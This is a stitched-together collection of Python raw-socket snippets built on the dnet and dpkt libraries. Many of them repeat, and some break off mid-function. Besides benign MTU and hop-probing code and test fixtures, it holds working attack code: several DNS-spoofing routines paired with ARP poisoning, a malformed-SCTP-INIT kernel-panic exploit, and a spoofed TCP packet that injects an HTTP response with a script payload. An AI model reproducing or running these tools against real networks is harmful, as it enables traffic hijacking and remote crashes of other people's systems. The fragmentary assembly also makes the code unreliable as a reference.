def confirm_max_mtu(host, hop, reported_payload_len=1024, src_ip=SRC_IP):
icmp_sock = get_icmp_sock()
ip = dnet.ip()
udp = dpkt.udp.UDP(sport=SPORT, dport=hop)
udp.data = 'A' * reported_payload_len
udp.ulen += len(udp.data)
pkt = dpkt.ip.IP(src=socket.inet_aton(src_ip),
dst=socket.inet_aton(host),
ttl=hop,
id=hop,
p=0x11)
pkt.data = udp
pkt.len += len(str(pkt.data))
ip.send(str(pkt))
timeout = time.time(
) + TIMEOUT # give a few seconds for all routers to respond
while time.time() < timeout:
try:
data, addr = icmp_sock.recvfrom(1508)
except socket.timeout:
return -1
ip_pkt = dpkt.ip.IP(data)
icmp_pkt = ip_pkt.data
inner_ip_pkt = icmp_pkt.data.data
udp_pkt = inner_ip_pkt.data
payload = udp_pkt.data
return len(payload) - len(payload.replace('A' * 8, ''))
return -1
def confirm_max_mtu(host, hop, reported_payload_len=1024, src_ip=SRC_IP):
icmp_sock = get_icmp_sock()
ip = dnet.ip()
udp = dpkt.udp.UDP(sport=SPORT, dport=hop)
udp.data = 'A'*reported_payload_len
udp.ulen += len(udp.data)
pkt = dpkt.ip.IP(src=socket.inet_aton(src_ip), dst=socket.inet_aton(host), ttl=hop, id=hop, p=0x11)
pkt.data = udp
pkt.len += len(str(pkt.data))
ip.send(str(pkt))
timeout = time.time() + TIMEOUT # give a few seconds for all routers to respond
while time.time() < timeout:
try:
data, addr = icmp_sock.recvfrom(1508)
except socket.timeout:
return -1
ip_pkt = dpkt.ip.IP(data)
icmp_pkt = ip_pkt.data
inner_ip_pkt = icmp_pkt.data.data
udp_pkt = inner_ip_pkt.data
payload = udp_pkt.data
return len(payload) - len(payload.replace('A'*8, ''))
return -1
def __init__ (self, ip, tcp):
self.ip = ip
self.tcp = tcp
self.tcp.flags = dpkt.tcp.TH_ACK
self.tcp.data = struct.pack('H', 0)
self.sock = dnet.ip()
threading.Thread.__init__(self)
def Send(self):
ip = dnet.ip()
for pkt in self.packets:
data = str(pkt)
data = dnet.ip_checksum(data)
ip.send(data)
time.sleep(0.10)
def Send(self):
ip = dnet.ip()
for pkt in self.packets:
data = str(pkt)
data = dnet.ip_checksum(data)
ip.send(data)
time.sleep(0.10)
def main():
if len(sys.argv) != 3:
usage()
host = sys.argv[1]
port = int(sys.argv[2])
try:
sock = dnet.ip()
intf = dnet.intf()
except OSError:
err('requires root privileges for raw socket access')
dst_addr = socket.gethostbyname(host)
interface = intf.get_dst(dnet.addr(dst_addr))
src_addr = interface['addr'].ip
msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))
invalid = ''
invalid += '\x20\x10\x11\x73'
invalid += '\x00\x00\xf4\x00'
invalid += '\x00\x05'
invalid += '\x00\x05'
invalid += '\x20\x10\x11\x73'
for i in xrange(20):
invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'
init = dpkt.sctp.Chunk()
init.type = dpkt.sctp.INIT
init.data = invalid
init.len = len(init)
sctp = dpkt.sctp.SCTP()
sctp.sport = 0x1173
sctp.dport = port
sctp.data = [ init ]
ip = dpkt.ip.IP()
ip.src = src_addr
ip.dst = dnet.ip_aton(dst_addr)
ip.p = dpkt.ip.IP_PROTO_SCTP
ip.data = sctp
ip.len = len(ip)
print `ip`
pkt = dnet.ip_checksum(str(ip))
sock.send(pkt)
msg('kernel should have panicked on remote host %s' % (dst_addr))
def main():
if len(sys.argv) != 3:
usage()
host = sys.argv[1]
port = int(sys.argv[2])
try:
sock = dnet.ip()
intf = dnet.intf()
except OSError:
err('requires root privileges for raw socket access')
dst_addr = socket.gethostbyname(host)
interface = intf.get_dst(dnet.addr(dst_addr))
src_addr = interface['addr'].ip
msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))
invalid = ''
invalid += '\x20\x10\x11\x73'
invalid += '\x00\x00\xf4\x00'
invalid += '\x00\x05'
invalid += '\x00\x05'
invalid += '\x20\x10\x11\x73'
for i in xrange(20):
invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'
init = dpkt.sctp.Chunk()
init.type = dpkt.sctp.INIT
init.data = invalid
init.len = len(init)
sctp = dpkt.sctp.SCTP()
sctp.sport = 0x1173
sctp.dport = port
sctp.data = [init]
ip = dpkt.ip.IP()
ip.src = src_addr
ip.dst = dnet.ip_aton(dst_addr)
ip.p = dpkt.ip.IP_PROTO_SCTP
ip.data = sctp
ip.len = len(ip)
print ` ip `
pkt = dnet.ip_checksum(str(ip))
sock.send(pkt)
msg('kernel should have panicked on remote host %s' % (dst_addr))
def test_dest(dest, min_ttl=MIN_TTL, src_ip=SRC_IP):
icmp_sock = get_icmp_sock()
ip = dnet.ip()
for ttl in range(min_ttl, MAX_TTL):
udp = dpkt.udp.UDP(sport=SPORT, dport=ttl)
udp.data = "pkt %d " % ttl
udp.data += 'A' * 250
udp.ulen += len(udp.data)
pkt = dpkt.ip.IP(src=socket.inet_aton(src_ip),
dst=socket.inet_aton(dest),
ttl=ttl,
id=ttl,
p=0x11)
pkt.data = udp
pkt.len += len(str(pkt.data))
ip.send(str(pkt))
time.sleep(.001)
timeout = time.time(
) + TIMEOUT # give a few seconds for all routers to respond
hops = {}
while time.time() < timeout:
try:
data, addr = icmp_sock.recvfrom(1508)
except socket.timeout:
return hops
ip_pkt = dpkt.ip.IP(data)
icmp_pkt = ip_pkt.data
inner_ip_pkt = icmp_pkt.data.data
payload_data = inner_ip_pkt.data
#print '%s (hop %d) sent %d bytes' % (addr[0], inner_ip_pkt.id, len(payload_data))
hops[payload_data.dport] = (addr[0], len(payload_data))
if (addr[0] == dest):
return hops
return hops
def send(self, x):
iff, a, gw = x.route()
if iff is None:
iff = conf.iface
ifs, cls = self.iflist.get(iff, (None, None))
if ifs is None:
iftype = self.intf.get(iff)["type"]
if iftype == dnet.INTF_TYPE_ETH:
try:
cls = conf.l2types[1]
except KeyError:
warning("Unable to find Ethernet class. Using nothing")
ifs = dnet.eth(iff)
else:
ifs = dnet.ip()
self.iflist[iff] = ifs, cls
if cls is None:
sx = str(x)
else:
sx = str(cls() / x)
x.sent_time = time.time()
ifs.send(sx)
def send(self, x):
iff, a, gw = x.route()
if iff is None:
iff = conf.iface
ifs, cls = self.iflist.get(iff, (None, None))
if ifs is None:
iftype = self.intf.get(iff)["type"]
if iftype == dnet.INTF_TYPE_ETH:
try:
cls = conf.l2types[1]
except KeyError:
warning("Unable to find Ethernet class. Using nothing")
ifs = dnet.eth(iff)
else:
ifs = dnet.ip()
self.iflist[iff] = ifs, cls
if cls is None:
sx = str(x)
else:
sx = str(cls() / x)
x.sent_time = time.time()
ifs.send(sx)
def test_dest(dest, min_ttl=MIN_TTL, src_ip=SRC_IP):
icmp_sock = get_icmp_sock()
ip = dnet.ip()
for ttl in range(min_ttl, MAX_TTL):
udp = dpkt.udp.UDP(sport=SPORT, dport=ttl)
udp.data = "pkt %d " % ttl
udp.data += 'A'*250
udp.ulen += len(udp.data)
pkt = dpkt.ip.IP(src=socket.inet_aton(src_ip), dst=socket.inet_aton(dest), ttl=ttl, id=ttl, p=0x11)
pkt.data = udp
pkt.len += len(str(pkt.data))
ip.send(str(pkt))
time.sleep(.001)
timeout = time.time() + TIMEOUT # give a few seconds for all routers to respond
hops = {}
while time.time() < timeout:
try:
data, addr = icmp_sock.recvfrom(1508)
except socket.timeout:
return hops
ip_pkt = dpkt.ip.IP(data)
icmp_pkt = ip_pkt.data
inner_ip_pkt = icmp_pkt.data.data
payload_data = inner_ip_pkt.data
#print '%s (hop %d) sent %d bytes' % (addr[0], inner_ip_pkt.id, len(payload_data))
hops[payload_data.dport] = (addr[0], len(payload_data))
if (addr[0] == dest):
return hops
return hops
def dns_spoof(self, host=None, redirection=None):
"""
Redirect all incoming request for 'host' to 'redirection'
"""
pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
redirection = gethostbyname(redirection)
sock = dnet.ip()
print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W
+ ' and ' + R
+ (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
# need to create a daemon that continually poison our target
poison_thread = Thread(target=self.poison, args=(2, ))
poison_thread.daemon = True
poison_thread.start()
packets = pcap.pcap(self.dev)
packets.setfilter(pcap_filter)
print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R
+ (','.join(self.target) if isinstance(self.target, list) else self.target) + W)
try:
for _, pkt in packets:
eth = dpkt.ethernet.Ethernet(pkt)
ip_packet = eth.data
udp = ip_packet.data
dns = dpkt.dns.DNS(udp.data)
# validate query
if dns.qr != dpkt.dns.DNS_Q:
continue
if dns.opcode != dpkt.dns.DNS_QUERY:
continue
if len(dns.qd) != 1:
continue
if len(dns.an) != 0:
continue
if len(dns.ns) != 0:
continue
if dns.qd[0].cls != dpkt.dns.DNS_IN:
continue
if dns.qd[0].type != dpkt.dns.DNS_A:
continue
# spoof for our target name
if dns.qd[0].name != host:
continue
# dns query->response
dns.op = dpkt.dns.DNS_RA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
dns.qr = dpkt.dns.DNS_R
# construct fake answer
arr = dpkt.dns.DNS.RR()
arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
arr.ip = dnet.addr(redirection).ip
dns.an.append(arr)
udp.sport, udp.dport = udp.dport, udp.sport
ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
udp.data, udp.ulen = dns, len(udp)
ip_packet.len = len(ip_packet)
print(inet_ntoa(ip_packet.src))
buf = dnet.ip_checksum(str(ip_packet))
sock.send(buf)
except KeyboardInterrupt:
print('[+] DNS spoofing interrupted\n\r')
self.restore(2)
utils.set_ip_forward(0)
else:
cur_pkt.off = (offset/8) & dpkt.ip.IP_OFFMASK
cur_pkt.data = data[offset:offset+off_step]
cur_pkt.len = len(cur_pkt.data) + 20
offset += off_step
yield cur_pkt
def copy_ip(ip_pkt):
new_pkt = dpkt.ip.IP(src=ip_pkt.src, dst=ip_pkt.dst, p=ip_pkt.p, ttl=ip_pkt.ttl, id=ip_pkt.id, off=ip_pkt.off, sum=ip_pkt.sum, len=ip_pkt.len)
new_pkt.data = ip_pkt.data
return new_pkt
net = dnet.ip()
dns = make_dns_pkt("twitter.com", srcip=sys.argv[1])
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
s.bind(('eth0', 0))
def mac(x):
return x.replace(':', '').decode('hex')
def send(pkt):
global s
#src = 'e8:2a:ea:5d:e9:f9'
src = '28:d2:44:9a:8e:60'
#dst = '00:23:33:ed:d4:14'
def setUp(self):
self.ip = dnet.ip()
self.failUnless(self.ip, "couldn't open raw IP handle")
def inject_pkt(pkt):
import dnet
dnet.ip().send(pkt)
def dns_spoof(dev,
source_mac,
source,
target=None,
host=None,
redirection=None):
redirection = gethostbyname(redirection)
sock = dnet.ip()
pcap_filter = 'udp dst port 53'
if target:
pcap_filter += ' and src %s' % target
print('[+] Start poisoning on ' + G + dev + W + ' between ' + G + source +
W + ' and ' + R + target + W)
# need to create a daemon that continually poison our target
thread = Thread(target=poison, args=(
dev,
source_mac,
source,
target,
2,
))
thread.daemon = True
thread.start()
pc = pcap.pcap(dev)
pc.setfilter(pcap_filter)
print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W +
' for ' + R + target + W)
try:
for ts, pkt in pc:
eth = dpkt.ethernet.Ethernet(pkt)
ip = eth.data
udp = ip.data
dns = dpkt.dns.DNS(udp.data)
# validate query
if dns.qr != dpkt.dns.DNS_Q:
continue
if dns.opcode != dpkt.dns.DNS_QUERY:
continue
if len(dns.qd) != 1:
continue
if len(dns.an) != 0:
continue
if len(dns.ns) != 0:
continue
if dns.qd[0].cls != dpkt.dns.DNS_IN:
continue
if dns.qd[0].type != dpkt.dns.DNS_A:
continue
# spoof for our target name
if dns.qd[0].name != host:
continue
# dns query->response
dns.op = dpkt.dns.DNS_RA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
dns.qr = dpkt.dns.DNS_R
# construct fake answer
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = host
arr.ip = dnet.addr(redirection).ip
# arr.ip = '\x4D\xEE\xB8\x96'
dns.an.append(arr)
udp.sport, udp.dport = udp.dport, udp.sport
ip.src, ip.dst = ip.dst, ip.src
udp.data = dns
udp.ulen = len(udp)
ip.len = len(ip)
print(inet_ntoa(ip.src))
buf = dnet.ip_checksum(str(ip))
sock.send(buf)
except KeyboardInterrupt:
print('[+] DNS spoofing interrupted\n\r')
utils.set_ip_forward(0)
#!/usr/bin/python
import socket
import dpkt
import dnet
import sys
import time
net = dnet.ip()
html = '''<h1>Win.</h1><script type="text/javascript">alert('pwnd');</script>\n'''
HTTP = '''HTTP/1.1 200
Content-Type: text/html
Content-Length: %d
%s''' % (len(html)-1, html)
HTTP = 'HTTP'*((1000-len(HTTP))/4) + HTTP
print 'HTTP payload len: %d' % len(HTTP)
def make_pkt(dport, seq):
ip = dpkt.ip.IP(src=socket.inet_aton('69.171.229.11'), \
dst=socket.inet_aton('141.212.111.200'), p=0x06)
tcp = dpkt.tcp.TCP(sport=80, dport=dport, data=HTTP, flags=0, seq=seq)
def dns_spoof(self, host=None, redirection=None):
"""
Redirect all incoming request for 'host' to 'redirection'
"""
pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
redirection = gethostbyname(redirection)
sock = dnet.ip()
print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
self.gateway + W + ' and ' + R +
(','.join(self.target) if isinstance(self.target, list
) else self.target) + W +
'\n')
# need to create a daemon that continually poison our target
poison_thread = Thread(target=self.poison, args=(2, ))
poison_thread.daemon = True
poison_thread.start()
packets = pcap.pcap(self.dev)
packets.setfilter(pcap_filter)
print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection +
W + ' for ' + R +
(','.join(self.target) if isinstance(self.target, list
) else self.target) + W)
try:
for _, pkt in packets:
eth = dpkt.ethernet.Ethernet(pkt)
ip_packet = eth.data
udp = ip_packet.data
dns = dpkt.dns.DNS(udp.data)
# validate query
if dns.qr != dpkt.dns.DNS_Q:
continue
if dns.opcode != dpkt.dns.DNS_QUERY:
continue
if len(dns.qd) != 1:
continue
if len(dns.an) != 0:
continue
if len(dns.ns) != 0:
continue
if dns.qd[0].cls != dpkt.dns.DNS_IN:
continue
if dns.qd[0].type != dpkt.dns.DNS_A:
continue
# spoof for our target name
if dns.qd[0].name != host:
continue
# dns query->response
dns.op = dpkt.dns.DNS_RA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
dns.qr = dpkt.dns.DNS_R
# construct fake answer
arr = dpkt.dns.DNS.RR()
arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
arr.ip = dnet.addr(redirection).ip
dns.an.append(arr)
udp.sport, udp.dport = udp.dport, udp.sport
ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
udp.data, udp.ulen = dns, len(udp)
ip_packet.len = len(ip_packet)
print(inet_ntoa(ip_packet.src))
buf = dnet.ip_checksum(str(ip_packet))
sock.send(buf)
except KeyboardInterrupt:
print('[+] DNS spoofing interrupted\n\r')
self.restore(2)
utils.set_ip_forward(0)
#from netfilterqueue import NetfilterQueue
import socket
import dpkt
import dnet
import time
import random
import sys
import select
RELAY = socket.inet_aton('68.40.51.184')
PROXY = socket.inet_aton('141.212.109.239')
MTU = 496 # must be divisible by 8
IFACE = "eth0"
out = dnet.ip()
routers = None
router_index = None
'''
Returns a (dest, ttl_hop, mtu) tuple that we know to be a
router that will support TTL exceeded
'''
def get_router():
global routers, router_index
if routers == None:
print 'Initializing routers...'
import testbgp
f = open("bgp-prefixes", "r")
routers = testbgp.get_hops(f, 2)
def dns_spoof(dev, source_mac, source, target = None, host = None, redirection = None): redirection = gethostbyname(redirection) sock = dnet.ip() filter = 'udp dst port 53' if target: filter += ' and src %s' % target print '[+] Start poisoning on ' + G + dev + W + ' between ' + G + source + W + ' and ' + R + target + W # need to create a daemon that continually poison our target thread = Thread(target = poison, args = (dev, source_mac, source, target, 2, )) thread.daemon = True thread.start() pc = pcap.pcap(dev) pc.setfilter(filter) print '[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + target + W try: for ts, pkt in pc: eth = dpkt.ethernet.Ethernet(pkt) ip = eth.data udp = ip.data dns = dpkt.dns.DNS(udp.data) # validate query if dns.qr != dpkt.dns.DNS_Q: continue if dns.opcode != dpkt.dns.DNS_QUERY: continue if len(dns.qd) != 1: continue if len(dns.an) != 0: continue if len(dns.ns) != 0: continue if dns.qd[0].cls != dpkt.dns.DNS_IN: continue if dns.qd[0].type != dpkt.dns.DNS_A: continue # spoof for our target name if dns.qd[0].name != host: continue # dns query->response dns.op = dpkt.dns.DNS_RA dns.rcode = dpkt.dns.DNS_RCODE_NOERR dns.qr = dpkt.dns.DNS_R # construct fake answer arr = dpkt.dns.DNS.RR() arr.cls = dpkt.dns.DNS_IN arr.type = dpkt.dns.DNS_A arr.name = host arr.ip = dnet.addr(redirection).ip # arr.ip = '\x4D\xEE\xB8\x96' dns.an.append(arr) udp.sport, udp.dport = udp.dport, udp.sport ip.src, ip.dst = ip.dst, ip.src udp.data = dns udp.ulen = len(udp) ip.len = len(ip) print inet_ntoa(ip.src) buf = dnet.ip_checksum(str(ip)) try: sock.send(buf) except: pass except KeyboardInterrupt: print '[+] DNS spoofing interrupted\n\r' set_ip_forward(0)
def setUp(self):
self.ip = dnet.ip()
self.assertTrue(self.ip, "couldn't open raw IP handle")
#!/usr/bin/python
# iptables -N pb_in
# iptables -A pb_in -p icmp -j NFQUEUE --queue-num 2
# iptables -A INPUT -j pb_in
from netfilterqueue import NetfilterQueue
import socket
import dpkt
import dnet
out = dnet.ip()
class PacketError(Exception):
pass
def unnest_payload(bytes):
ip = dpkt.ip.IP(bytes)
if not isinstance(ip.data, dpkt.icmp.ICMP):
raise PacketError
icmp = ip.data
if not isinstance(icmp.data, dpkt.icmp.ICMP.Unreach) and \
not isinstance(icmp.data, dpkt.icmp.ICMP.TimeExceed):
raise PacketError
icmp_payload = icmp.data
if not isinstance(icmp_payload.data, dpkt.ip.IP):
raise PacketError
ip2 = icmp_payload.data
if not isinstance(ip2.data, dpkt.udp.UDP):
def setUp(self):
self.ip = dnet.ip()
self.failUnless(self.ip, "couldn't open raw IP handle")